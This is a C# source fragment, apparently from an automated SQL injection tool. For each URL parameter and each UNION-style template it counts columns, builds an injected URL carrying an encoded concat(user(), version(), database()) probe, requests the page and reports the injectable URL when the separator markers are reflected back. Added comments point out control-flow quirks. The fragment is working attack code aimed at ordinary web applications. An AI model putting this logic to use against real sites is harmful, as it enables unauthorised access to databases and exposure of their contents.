        sqli_check vrf = new sqli_check();
        sqli_colonne colonne = new sqli_colonne();
        string url_inj_point = string.Empty;
        string inj_point_curr = string.Empty;
        bool point_trv = false;
        _url_originale = url;
        // Everything before the first '?' is treated as the base URL.
        _url_base = url.Split('?')[0];
        _param = ch.analyseParam(url);
        int u = 0;
        // Union style 1
        // point_trv is never set to true here; the loop ends by return or when u runs out.
        while (!point_trv && u < _unionStyle.Count)
        {
            _nbr_colonne = colonne.Compter(_param, _url_base, _unionStyle[u]);
            for (int p = 0; p < _param.Count; p++)
            {
                // The argument is built with the PREVIOUS value of _colonne_point,
                // which is then overwritten by the result.
                _colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne);
                // Same URL shape, rebuilt with the updated _colonne_point.
                url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count);
                // Replace any remaining "[t]" token with the encoded probe expression.
                inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"));
                string page = hr.get(inj_point_curr);
                // Either marker in the response is taken as proof that the probe was reflected.
                if (page.Contains(separateur) || page.Contains(s_separateur))
                {
                    return(url_inj_point);
                }
            }
            u++;
        }
        // Failure is signalled with the string "False", not null or an empty string.
        return("False");
    }
}